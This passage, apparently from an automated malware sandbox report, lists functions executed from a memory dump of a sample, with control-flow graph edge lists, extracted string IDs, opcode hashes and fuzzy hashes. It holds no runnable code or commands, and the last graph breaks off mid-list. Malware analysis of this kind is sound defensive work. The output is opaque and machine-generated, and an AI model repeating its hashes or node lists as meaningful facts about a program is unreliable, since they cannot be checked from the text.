27397->27399 27398->27391 27399->27398 27401 5647ea8 DuplicateHandle 27400->27401 27402 5647e6e 27401->27402 27402->27391 27403 5648ee9 27404 5648ef0 SetTimer 27403->27404 27405 5648f5c 27404->27405

              Executed Functions

              Function 00FA6730 Relevance: 6.7, Strings: 5, Instructions: 464COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 146 fa6730-fa6766 147 fa676e-fa6774 146->147 277 fa6768 call fa6108 146->277 278 fa6768 call fa6730 146->278 279 fa6768 call fa6880 146->279 148 fa6776-fa677a 147->148 149 fa67c4-fa67c8 147->149 152 fa6789-fa6790 148->152 153 fa677c-fa6781 148->153 150 fa67ca-fa67d9 149->150 151 fa67df-fa67f3 149->151 156 fa67db-fa67dd 150->156 157 fa6805-fa680f 150->157 158 fa67fb-fa6802 151->158 274 fa67f5 call fa9858 151->274 275 fa67f5 call fa9851 151->275 154 fa6866-fa68a3 152->154 155 fa6796-fa679d 152->155 153->152 168 fa68ae-fa68ce 154->168 169 fa68a5-fa68ab 154->169 155->149 159 fa679f-fa67a3 155->159 156->158 160 fa6819-fa681d 157->160 161 fa6811-fa6817 157->161 162 fa67b2-fa67b9 159->162 163 fa67a5-fa67aa 159->163 165 fa6825-fa685f 160->165 166 fa681f 160->166 161->165 162->154 167 fa67bf-fa67c2 162->167 163->162 165->154 166->165 167->158 174 fa68d0 168->174 175 fa68d5-fa68dc 168->175 169->168 177 fa6c64-fa6c6d 174->177 178 fa68de-fa68e9 175->178 179 fa68ef-fa6902 178->179 180 fa6c75-fa6cb1 178->180 185 fa6918-fa6933 179->185 186 fa6904-fa6912 179->186 189 fa6cba-fa6cbe 180->189 190 fa6cb3-fa6cb8 180->190 194 fa6957-fa695a 185->194 195 fa6935-fa693b 185->195 186->185 192 fa6bec-fa6bf3 186->192 193 fa6cc4-fa6cc5 189->193 190->193 192->177 196 fa6bf5-fa6bf7 192->196 197 fa6960-fa6963 194->197 198 fa6ab4-fa6aba 194->198 199 fa693d 195->199 200 fa6944-fa6947 195->200 203 fa6bf9-fa6bfe 196->203 204 fa6c06-fa6c0c 196->204 197->198 207 fa6969-fa696f 197->207 202 fa6ba6-fa6ba9 198->202 206 fa6ac0-fa6ac5 198->206 199->198 199->200 201 fa697a-fa6980 199->201 199->202 200->201 205 fa6949-fa694c 200->205 212 fa6982-fa6984 201->212 213 fa6986-fa6988 201->213 214 fa6baf-fa6bb5 202->214 215 fa6c70 202->215 203->204 204->180 210 fa6c0e-fa6c13 204->210 208 fa6952 205->208 209 fa69e6-fa69ec 205->209 206->202 207->198 211 fa6975 207->211 208->202 209->202 218 fa69f2-fa69f8 209->218 216 fa6c58-fa6c5b 210->216 217 fa6c15-fa6c1a 210->217 211->202 219 fa6992-fa699b 212->219 213->219 220 fa6bda-fa6bde 214->220 221 fa6bb7-fa6bbf 214->221 215->180 216->215 222 fa6c5d-fa6c62 216->222 217->215 223 fa6c1c 217->223 224 fa69fa-fa69fc 218->224 225 fa69fe-fa6a00 218->225 227 fa69ae-fa69d6 219->227 228 fa699d-fa69a8 219->228 220->192 229 fa6be0-fa6be6 220->229 221->180 226 fa6bc5-fa6bd4 221->226 222->177 222->196 230 fa6c23-fa6c28 223->230 231 fa6a0a-fa6a21 224->231 225->231 226->185 226->220 249 fa6aca-fa6b00 227->249 250 fa69dc-fa69e1 227->250 228->202 228->227 229->178 229->192 233 fa6c4a-fa6c4c 230->233 234 fa6c2a-fa6c2c 230->234 243 fa6a4c-fa6a73 231->243 244 fa6a23-fa6a3c 231->244 233->215 240 fa6c4e-fa6c51 233->240 237 fa6c3b-fa6c41 234->237 238 fa6c2e-fa6c33 234->238 237->180 242 fa6c43-fa6c48 237->242 238->237 240->216 242->233 245 fa6c1e-fa6c21 242->245 243->215 255 fa6a79-fa6a7c 243->255 244->249 253 fa6a42-fa6a47 244->253 245->215 245->230 256 fa6b0d-fa6b15 249->256 257 fa6b02-fa6b06 249->257 250->249 253->249 255->215 258 fa6a82-fa6aab 255->258 256->215 261 fa6b1b-fa6b20 256->261 259 fa6b08-fa6b0b 257->259 260 fa6b25-fa6b29 257->260 258->249 273 fa6aad-fa6ab2 258->273 259->256 259->260 262 fa6b2b-fa6b31 260->262 263 fa6b48-fa6b4c 260->263 261->202 262->263 267 fa6b33-fa6b3b 262->267 265 fa6b4e-fa6b54 263->265 266 fa6b56-fa6b75 call fa6e58 263->266 265->266 268 fa6b7b-fa6b7f 265->268 266->268 267->215 269 fa6b41-fa6b46 267->269 268->202 271 fa6b81-fa6b9d 268->271 269->202 271->202 273->249 274->158 275->158 277->147 278->147 279->147
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$(o]q$(o]q$,aq$,aq
              • API String ID: 0-615190528
              • Opcode ID: 2d3851bbd67e24882938ac8737219635a3d835ccf02080ecce43af0d06270235
              • Instruction ID: 8fe2f5bc49b0a899ae0b758ebaac050c683d0b90d99432d98018423a069e1361
              • Opcode Fuzzy Hash: 2d3851bbd67e24882938ac8737219635a3d835ccf02080ecce43af0d06270235
              • Instruction Fuzzy Hash: 80127EB0E00209DFCB15CF68C984AADBBB2FF8A355F198469E455EB2A1D734DC41DB50
              Function 00FAB328 Relevance: 6.6, Strings: 5, Instructions: 349COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 280 fab328-fab33b 281 fab47a-fab481 280->281 282 fab341-fab34a 280->282 283 fab350-fab354 282->283 284 fab484 282->284 285 fab36e-fab375 283->285 286 fab356 283->286 287 fab489-fab491 284->287 285->281 289 fab37b-fab388 285->289 288 fab359-fab364 286->288 294 fab493-fab4b0 287->294 288->284 290 fab36a-fab36c 288->290 289->281 293 fab38e-fab3a1 289->293 290->285 290->288 295 fab3a3 293->295 296 fab3a6-fab3ae 293->296 297 fab4dc 294->297 298 fab4b2-fab4ca 294->298 295->296 300 fab41b-fab41d 296->300 301 fab3b0-fab3b6 296->301 299 fab4de-fab4e2 297->299 310 fab4cc-fab4d1 298->310 311 fab4d3-fab4d6 298->311 300->281 302 fab41f-fab425 300->302 301->300 303 fab3b8-fab3be 301->303 302->281 305 fab427-fab431 302->305 303->287 306 fab3c4-fab3dc 303->306 305->287 307 fab433-fab44b 305->307 318 fab409-fab40c 306->318 319 fab3de-fab3e4 306->319 322 fab44d-fab453 307->322 323 fab470-fab473 307->323 310->299 313 fab4d8-fab4da 311->313 314 fab4e3-fab520 311->314 313->297 313->298 329 fab522 314->329 330 fab527-fab604 call fa3908 call fa3428 314->330 318->284 320 fab40e-fab411 318->320 319->287 324 fab3ea-fab3fe 319->324 320->284 326 fab413-fab419 320->326 322->287 328 fab455-fab469 322->328 323->284 325 fab475-fab478 323->325 324->287 333 fab404 324->333 325->281 325->305 326->300 326->301 328->287 335 fab46b 328->335 329->330 344 fab60b-fab62c call fa4dc8 330->344 345 fab606 330->345 333->318 335->323 347 fab631-fab63c 344->347 345->344 348 fab63e 347->348 349 fab643-fab647 347->349 348->349 350 fab649-fab64a 349->350 351 fab64c-fab653 349->351 352 fab66b-fab6af 350->352 353 fab65a-fab668 351->353 354 fab655 351->354 358 fab715-fab72c 352->358 353->352 354->353 360 fab72e-fab753 358->360 361 fab6b1-fab6c7 358->361 370 fab76b 360->370 371 fab755-fab76a 360->371 365 fab6c9-fab6d5 361->365 366 fab6f1 361->366 367 fab6df-fab6e5 365->367 368 fab6d7-fab6dd 365->368 369 fab6f7-fab714 366->369 372 fab6ef 367->372 368->372 369->358 374 fab76c 370->374 371->370 372->369 374->374
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: abd1ef189ef3d47e4450827e9c6dff9893b9bc3d32513e9e33a7f6370fec8b26
              • Instruction ID: 81dae229ed6d451608ad8cd657a71e4f8c8b4fe257feef8b37cd343e4479d378
              • Opcode Fuzzy Hash: abd1ef189ef3d47e4450827e9c6dff9893b9bc3d32513e9e33a7f6370fec8b26
              • Instruction Fuzzy Hash: 30E109B5E00658CFDB14CFA9D984A9DBBB1FF49310F1580A9E819AB362DB34AC41DF50
              Function 00FAC190 Relevance: 6.4, Strings: 5, Instructions: 196COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 427 fac190 428 fac191 427->428 429 fac189-fac18c 428->429 430 fac193-fac195 428->430 431 fac18d-fac18f 429->431 430->431 432 fac197-fac199 430->432 431->427 432->428 433 fac19b-fac1c0 432->433 434 fac1c2 433->434 435 fac1c7-fac20f 433->435 434->435 437 fac217-fac226 call fa3908 435->437 439 fac22b-fac2a4 call fa3428 437->439 445 fac2ab-fac2cc call fa4dc8 439->445 446 fac2a6 439->446 448 fac2d1-fac2dc 445->448 446->445 449 fac2de 448->449 450 fac2e3-fac2e7 448->450 449->450 451 fac2e9-fac2ea 450->451 452 fac2ec-fac2f3 450->452 453 fac30b-fac34f 451->453 454 fac2fa-fac308 452->454 455 fac2f5 452->455 459 fac3b5-fac3cc 453->459 454->453 455->454 461 fac3ce-fac3f3 459->461 462 fac351-fac367 459->462 468 fac40b 461->468 469 fac3f5-fac40a 461->469 466 fac369-fac375 462->466 467 fac391 462->467 470 fac37f-fac385 466->470 471 fac377-fac37d 466->471 472 fac397-fac3b4 467->472 469->468 473 fac38f 470->473 471->473 472->459 473->472
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 6c325eabb34b5505890da96c9719f47005c4a7a5405aa76e9472b0382dcb38fa
              • Instruction ID: 350c019cd38e87fb757fd4991220bbbae6c189c3412dbcd631ff12ba275349aa
              • Opcode Fuzzy Hash: 6c325eabb34b5505890da96c9719f47005c4a7a5405aa76e9472b0382dcb38fa
              • Instruction Fuzzy Hash: 0491D6B4E00218DFDB14DFAAD884A9DBBF2BF89310F14C069E809AB365DB349941DF50
              Function 00FABEB0 Relevance: 6.4, Strings: 5, Instructions: 196COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 377 fabeb0 378 fabeb1 377->378 379 fabea9-fabeac 378->379 380 fabeb3-fabeb5 378->380 381 fabead-fabeaf 379->381 380->381 382 fabeb7-fabeb9 380->382 381->377 382->378 383 fabebb-fabee0 382->383 384 fabee2 383->384 385 fabee7-fabf2f 383->385 384->385 387 fabf37-fabf46 call fa3908 385->387 389 fabf4b-fabfc4 call fa3428 387->389 395 fabfcb-fabfec call fa4dc8 389->395 396 fabfc6 389->396 398 fabff1-fabffc 395->398 396->395 399 fabffe 398->399 400 fac003-fac007 398->400 399->400 401 fac009-fac00a 400->401 402 fac00c-fac013 400->402 403 fac02b-fac06f 401->403 404 fac01a-fac028 402->404 405 fac015 402->405 409 fac0d5-fac0ec 403->409 404->403 405->404 411 fac0ee-fac113 409->411 412 fac071-fac087 409->412 419 fac12b 411->419 420 fac115-fac12a 411->420 416 fac089-fac095 412->416 417 fac0b1 412->417 421 fac09f-fac0a5 416->421 422 fac097-fac09d 416->422 418 fac0b7-fac0d4 417->418 418->409 420->419 423 fac0af 421->423 422->423 423->418
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: e17ceb1642a15c5ac71f92b1c8cdddf8542caca782fc66b42de946576ac473ef
              • Instruction ID: 32d75a5797cd78b5fa581d238fe8455e6a28b73542c000d9ddd01fee64e414b6
              • Opcode Fuzzy Hash: e17ceb1642a15c5ac71f92b1c8cdddf8542caca782fc66b42de946576ac473ef
              • Instruction Fuzzy Hash: 6C91B2B4E01218CFDB14DFA9D884A9DBBF2BF89310F14C069E809AB365DB349945DF50
              Function 00FAC751 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 477 fac751-fac758 478 fac75a-fac780 477->478 479 fac6dd-fac6ec 477->479 480 fac782 478->480 481 fac787-fac7cf 478->481 479->477 480->481 486 fac7d7-fac7e6 call fa3908 481->486 489 fac7eb-fac864 call fa3428 486->489 495 fac86b-fac88c call fa4dc8 489->495 496 fac866 489->496 498 fac891-fac89c 495->498 496->495 499 fac89e 498->499 500 fac8a3-fac8a7 498->500 499->500 501 fac8a9-fac8aa 500->501 502 fac8ac-fac8b3 500->502 503 fac8cb-fac90f 501->503 504 fac8ba-fac8c8 502->504 505 fac8b5 502->505 509 fac975-fac98c 503->509 504->503 505->504 511 fac98e-fac9b3 509->511 512 fac911-fac927 509->512 519 fac9cb 511->519 520 fac9b5-fac9ca 511->520 516 fac929-fac935 512->516 517 fac951 512->517 521 fac93f-fac945 516->521 522 fac937-fac93d 516->522 518 fac957-fac974 517->518 518->509 520->519 523 fac94f 521->523 522->523 523->518
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 813570c96a9d76c3b43cc8b3218571b7aaf36769af8eb0daeaae87b085ab6409
              • Instruction ID: 154fe8a20d781db8d49aaf9bf5fa7fb198e548fd1a85bcbd1d3d1eb8aea07c1c
              • Opcode Fuzzy Hash: 813570c96a9d76c3b43cc8b3218571b7aaf36769af8eb0daeaae87b085ab6409
              • Instruction Fuzzy Hash: 1E81C5B4E00218DFDB14DFAAD984A9DBBF2BF89310F14C469E809AB365DB349941DF50
              Function 00FA4AD9 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 527 fa4ad9-fa4b08 528 fa4b0a 527->528 529 fa4b0f-fa4bec call fa3908 call fa3428 527->529 528->529 539 fa4bee 529->539 540 fa4bf3-fa4c11 529->540 539->540 570 fa4c14 call fa4dbb 540->570 571 fa4c14 call fa4dc8 540->571 541 fa4c1a-fa4c25 542 fa4c2c-fa4c30 541->542 543 fa4c27 541->543 544 fa4c32-fa4c33 542->544 545 fa4c35-fa4c3c 542->545 543->542 546 fa4c54-fa4c98 544->546 547 fa4c3e 545->547 548 fa4c43-fa4c51 545->548 552 fa4cfe-fa4d15 546->552 547->548 548->546 554 fa4c9a-fa4cb0 552->554 555 fa4d17-fa4d3c 552->555 559 fa4cda 554->559 560 fa4cb2-fa4cbe 554->560 561 fa4d3e-fa4d53 555->561 562 fa4d54 555->562 565 fa4ce0-fa4cfd 559->565 563 fa4cc8-fa4cce 560->563 564 fa4cc0-fa4cc6 560->564 561->562 566 fa4cd8 563->566 564->566 565->552 566->565 570->541 571->541
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 94f6e5896a062e199f5e58223ef057d1c0b0f85e8ad577dfefb122fdf10b0583
              • Instruction ID: b5549b10c4928211b2263ca646977e55be9ad9ab78f5d9cd7db1b925149dd496
              • Opcode Fuzzy Hash: 94f6e5896a062e199f5e58223ef057d1c0b0f85e8ad577dfefb122fdf10b0583
              • Instruction Fuzzy Hash: A981D3B4E01218DFDB14DFA9D884A9DBBF2BF89310F10C069E819AB365DB74A941DF50
              Function 00FACA31 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 572 faca31-faca60 573 faca62 572->573 574 faca67-facb44 call fa3908 call fa3428 572->574 573->574 584 facb4b-facb6c call fa4dc8 574->584 585 facb46 574->585 587 facb71-facb7c 584->587 585->584 588 facb7e 587->588 589 facb83-facb87 587->589 588->589 590 facb89-facb8a 589->590 591 facb8c-facb93 589->591 592 facbab-facbef 590->592 593 facb9a-facba8 591->593 594 facb95 591->594 598 facc55-facc6c 592->598 593->592 594->593 600 facc6e-facc93 598->600 601 facbf1-facc07 598->601 607 faccab 600->607 608 facc95-faccaa 600->608 605 facc09-facc15 601->605 606 facc31 601->606 609 facc1f-facc25 605->609 610 facc17-facc1d 605->610 611 facc37-facc54 606->611 608->607 612 facc2f 609->612 610->612 611->598 612->611
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 70a0bed12c639842dfc6660148f33ffc74e286939e0e721130bc458e9c996a8d
              • Instruction ID: 34c0516813f55b9d35394607369ef4a4627ae9111b6e72886742380d1b905483
              • Opcode Fuzzy Hash: 70a0bed12c639842dfc6660148f33ffc74e286939e0e721130bc458e9c996a8d
              • Instruction Fuzzy Hash: C281B5B4E00218DFDB14DFA9D984A9DBBF2BF89310F14C069E819AB365DB349941DF60
              Function 00FAC470 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 616 fac470-fac4a0 617 fac4a2 616->617 618 fac4a7-fac584 call fa3908 call fa3428 616->618 617->618 628 fac58b-fac5bc call fa4dc8 618->628 629 fac586 618->629 632 fac5be 628->632 633 fac5c3-fac5c7 628->633 629->628 632->633 634 fac5c9-fac5ca 633->634 635 fac5cc-fac5d3 633->635 636 fac5eb-fac62f 634->636 637 fac5da-fac5e8 635->637 638 fac5d5 635->638 642 fac695-fac6ac 636->642 637->636 638->637 644 fac6ae-fac6d3 642->644 645 fac631-fac647 642->645 651 fac6eb-fac758 644->651 652 fac6d5-fac6d8 644->652 649 fac649-fac655 645->649 650 fac671 645->650 653 fac65f-fac665 649->653 654 fac657-fac65d 649->654 655 fac677-fac694 650->655 656 fac6dd-fac6ea 651->656 662 fac75a-fac780 651->662 652->656 657 fac66f 653->657 654->657 655->642 656->651 657->655 664 fac782 662->664 665 fac787-fac864 call fa3908 call fa3428 662->665 664->665 675 fac86b-fac88c call fa4dc8 665->675 676 fac866 665->676 678 fac891-fac89c 675->678 676->675 679 fac89e 678->679 680 fac8a3-fac8a7 678->680 679->680 681 fac8a9-fac8aa 680->681 682 fac8ac-fac8b3 680->682 683 fac8cb-fac90f 681->683 684 fac8ba-fac8c8 682->684 685 fac8b5 682->685 689 fac975-fac98c 683->689 684->683 685->684 691 fac98e-fac9b3 689->691 692 fac911-fac927 689->692 699 fac9cb 691->699 700 fac9b5-fac9ca 691->700 696 fac929-fac935 692->696 697 fac951 692->697 701 fac93f-fac945 696->701 702 fac937-fac93d 696->702 698 fac957-fac974 697->698 698->689 700->699 703 fac94f 701->703 702->703 703->698
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: de0b2ba7a4daf019d237e513200f7a62eec7568fdd026919fa5dc045d66eeb8e
              • Instruction ID: 207366b0163a4d98bf28ad3666a7f7cfcce9abf6434c8fcd4b24eb2b9e9aa7f3
              • Opcode Fuzzy Hash: de0b2ba7a4daf019d237e513200f7a62eec7568fdd026919fa5dc045d66eeb8e
              • Instruction Fuzzy Hash: E981E5B4E00218CFDB14DFAAD984A9DBBF2BF89310F14C469E819AB365DB349941DF50
              Function 00FABBD2 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 707 fabbd2-fabc00 708 fabc02 707->708 709 fabc07-fabce4 call fa3908 call fa3428 707->709 708->709 719 fabceb-fabd0c call fa4dc8 709->719 720 fabce6 709->720 722 fabd11-fabd1c 719->722 720->719 723 fabd1e 722->723 724 fabd23-fabd27 722->724 723->724 725 fabd29-fabd2a 724->725 726 fabd2c-fabd33 724->726 727 fabd4b-fabd8f 725->727 728 fabd3a-fabd48 726->728 729 fabd35 726->729 733 fabdf5-fabe0c 727->733 728->727 729->728 735 fabe0e-fabe33 733->735 736 fabd91-fabda7 733->736 745 fabe4b 735->745 746 fabe35-fabe4a 735->746 740 fabda9-fabdb5 736->740 741 fabdd1 736->741 742 fabdbf-fabdc5 740->742 743 fabdb7-fabdbd 740->743 744 fabdd7-fabdf4 741->744 747 fabdcf 742->747 743->747 744->733 746->745 747->744
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: fce955c98ede1fb76bc121c930d20e16a33d072274b1bb511bcdfddc21d26113
              • Instruction ID: 9aa01c17a3263336641f5c25de34c4972c401f3416e378a5a3a18da99e1cdd06
              • Opcode Fuzzy Hash: fce955c98ede1fb76bc121c930d20e16a33d072274b1bb511bcdfddc21d26113
              • Instruction Fuzzy Hash: 5481B5B4E00258DFDB14DFA9D984A9DBBF2BF89310F14C069E809AB366DB349941DF10
              Function 00FAB4F3 Relevance: 3.9, Strings: 3, Instructions: 161COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$PH]q$PH]q
              • API String ID: 0-2023588385
              • Opcode ID: b881334560d4c3965b2c345c311c0bd6bc4cd4e0bfc7ef7d484c808bc43bef69
              • Instruction ID: 1c0c99bdb2b354a00075d65b73239baa9564b1f5259ae0a93d6da192e7077b03
              • Opcode Fuzzy Hash: b881334560d4c3965b2c345c311c0bd6bc4cd4e0bfc7ef7d484c808bc43bef69
              • Instruction Fuzzy Hash: 9461E8B4E042589FDB18DFAAD944A9DBBF2FF89310F14C069E804AB366DB349941DF10
              Function 00FA9858 Relevance: 3.4, Strings: 2, Instructions: 857COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$4']q
              • API String ID: 0-176817397
              • Opcode ID: 6116bede32143fa75b47baa70fcdcb3e307b3bafe53d93310960b11ab4b006b9
              • Instruction ID: df9dcdea916339a61e6fc3d6422c9f5cd7a7bab72108c2a180d5cbb130994523
              • Opcode Fuzzy Hash: 6116bede32143fa75b47baa70fcdcb3e307b3bafe53d93310960b11ab4b006b9
              • Instruction Fuzzy Hash: 5F72B0B1A04209DFCB15CF68C884AAEBBF2FF89310F158569E8059B2A1D770EC45DF61
              Function 00FA6108 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$Haq
              • API String ID: 0-903699183
              • Opcode ID: 1dd55d3f690706718bc69bee1ef958d5859db5ebddd08f3b8daf6adee3f22812
              • Instruction ID: f291136bffbbad46b1553d74d7f71e0fb3ee6081ca48d939696bf91f048bc98e
              • Opcode Fuzzy Hash: 1dd55d3f690706718bc69bee1ef958d5859db5ebddd08f3b8daf6adee3f22812
              • Instruction Fuzzy Hash: 4B12AEB0A002198FDB14DF69C844AAEBBF6FF89304F248569E845DB391DF349D46DB90
              Function 00FAF01F Relevance: .7, Instructions: 715COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04427d702594d71969bc13624d0d8a9ff3af18a214c62e3c1d62f82a13a96025
              • Instruction ID: 65632708eecc8bdb8f4b97a1780bdaf9c7d420ebbe2c2acb0354fe6e3c46698f
              • Opcode Fuzzy Hash: 04427d702594d71969bc13624d0d8a9ff3af18a214c62e3c1d62f82a13a96025
              • Instruction Fuzzy Hash: 9372DFB4E012298FDB65DF69C880BEDBBB2BF49300F5481E9D408AB255DB349E85DF50
              Function 00FA6E58 Relevance: 10.5, Strings: 8, Instructions: 477COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 fa6e58-fa6e8d 1 fa72bc-fa72c0 0->1 2 fa6e93-fa6eb6 0->2 3 fa72d9-fa72e7 1->3 4 fa72c2-fa72d6 1->4 11 fa6ebc-fa6ec9 2->11 12 fa6f64-fa6f68 2->12 9 fa7358-fa736d 3->9 10 fa72e9-fa72fe 3->10 17 fa736f-fa7372 9->17 18 fa7374-fa7381 9->18 19 fa7300-fa7303 10->19 20 fa7305-fa7312 10->20 28 fa6ecb-fa6ed6 11->28 29 fa6ed8 11->29 15 fa6f6a-fa6f78 12->15 16 fa6fb0-fa6fb9 12->16 15->16 36 fa6f7a-fa6f95 15->36 21 fa73cf 16->21 22 fa6fbf-fa6fc9 16->22 24 fa7383-fa73be 17->24 18->24 25 fa7314-fa7355 19->25 20->25 30 fa73d4-fa7404 21->30 22->1 26 fa6fcf-fa6fd8 22->26 77 fa73c5-fa73cc 24->77 34 fa6fda-fa6fdf 26->34 35 fa6fe7-fa6ff3 26->35 31 fa6eda-fa6edc 28->31 29->31 53 fa741d-fa7424 30->53 54 fa7406-fa741c 30->54 31->12 38 fa6ee2-fa6f44 31->38 34->35 35->30 41 fa6ff9-fa6fff 35->41 60 fa6fa3 36->60 61 fa6f97-fa6fa1 36->61 86 fa6f4a-fa6f61 38->86 87 fa6f46 38->87 43 fa72a6-fa72aa 41->43 44 fa7005-fa7015 41->44 43->21 47 fa72b0-fa72b6 43->47 58 fa7029-fa702b 44->58 59 fa7017-fa7027 44->59 47->1 47->26 62 fa702e-fa7034 58->62 59->62 63 fa6fa5-fa6fa7 60->63 61->63 62->43 66 fa703a-fa7049 62->66 63->16 67 fa6fa9 63->67 72 fa704f 66->72 73 fa70f7-fa7122 call fa6ca0 * 2 66->73 67->16 75 fa7052-fa7063 72->75 90 fa7128-fa712c 73->90 91 fa720c-fa7226 73->91 75->30 79 fa7069-fa707b 75->79 79->30 81 fa7081-fa7099 79->81 144 fa709b call fa7438 81->144 145 fa709b call fa7428 81->145 85 fa70a1-fa70b1 85->43 89 fa70b7-fa70ba 85->89 86->12 87->86 92 fa70bc-fa70c2 89->92 93 fa70c4-fa70c7 89->93 90->43 95 fa7132-fa7136 90->95 91->1 113 fa722c-fa7230 91->113 92->93 96 fa70cd-fa70d0 92->96 93->21 93->96 98 fa7138-fa7145 95->98 99 fa715e-fa7164 95->99 100 fa70d8-fa70db 96->100 101 fa70d2-fa70d6 96->101 116 fa7147-fa7152 98->116 117 fa7154 98->117 103 fa719f-fa71a5 99->103 104 fa7166-fa716a 99->104 100->21 102 fa70e1-fa70e5 100->102 101->100 101->102 102->21 105 fa70eb-fa70f1 102->105 107 fa71b1-fa71b7 103->107 108 fa71a7-fa71ab 103->108 104->103 106 fa716c-fa7175 104->106 105->73 105->75 111 fa7177-fa717c 106->111 112 fa7184-fa719a 106->112 114 fa71b9-fa71bd 107->114 115 fa71c3-fa71c5 107->115 108->77 108->107 111->112 112->43 121 